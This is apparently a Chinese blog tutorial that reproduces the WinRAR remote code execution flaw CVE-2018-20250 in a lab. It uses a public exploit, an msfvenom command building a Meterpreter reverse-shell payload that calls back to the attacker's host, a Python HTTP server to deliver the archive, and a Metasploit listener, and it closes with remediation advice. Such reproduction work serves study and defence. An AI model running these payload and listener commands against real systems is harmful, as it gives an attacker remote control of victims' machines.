winRAR远程代码执行漏洞复现(CVE-2018-20250)

1.漏洞影响

WinRAR < 5.70 Beta 1

Bandizip< = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩< = 4.0.0.1170

2.环境搭建

攻击机:kali-2019                       ip:192.168.0.171

靶机:windows 7 +winrar5.5                        ip:192.168.0.169

3.漏洞复现

(1)下载WinRAR漏洞exp:https://github.com/WyAtu/CVE-2018-20250

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第1张图片

(2)利用msfvenom生成恶意文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.171 lport=1234 -f exe >./test.exe

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第2张图片

(3)编辑winrar漏洞exp文件

vi exp.py 

按i进行编辑

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第3张图片

修改python3的运行命令

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第4张图片

修改完后按esc退出编辑,然后按:,输入wq保存

(4)运行winrar漏洞exp

python3 exp.py

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第5张图片

(5)把恶意winrar文件传到靶机

为了方便,利用python开启临时server

python -m SimpleHTTPServer 999

利用靶机浏览器访问,并下载test.rar

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第6张图片

(6)kali启动msf,设置监听

msfconsole 

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第7张图片

使用监听模块,并设置参数

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.171

set lport 1234

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第8张图片

show options查看是否有遗漏

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第9张图片

运行,exploit

(7)靶机解压恶意winrar文件

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第10张图片

解压后会在自启动目录生成一个恶意文件hi.exe

目录为:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\(administrator改为你当前用户名)

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第11张图片

当电脑重启后就会自动运行该文件(这里为了方便就直接双击了),查看进程hi.exe已经运行

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第12张图片

(8)返回kali,已经建立会话sessions

winRAR远程代码执行漏洞复现(CVE-2018-20250)_第13张图片

 

4.漏洞修复

更新winrar到最新版本

使用其它的解压软件,如7z

 

 

漏洞分析链接:https://research.checkpoint.com/extracting-code-execution-from-winrar/

 

 

 

感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!

你可能感兴趣的:(漏洞复现)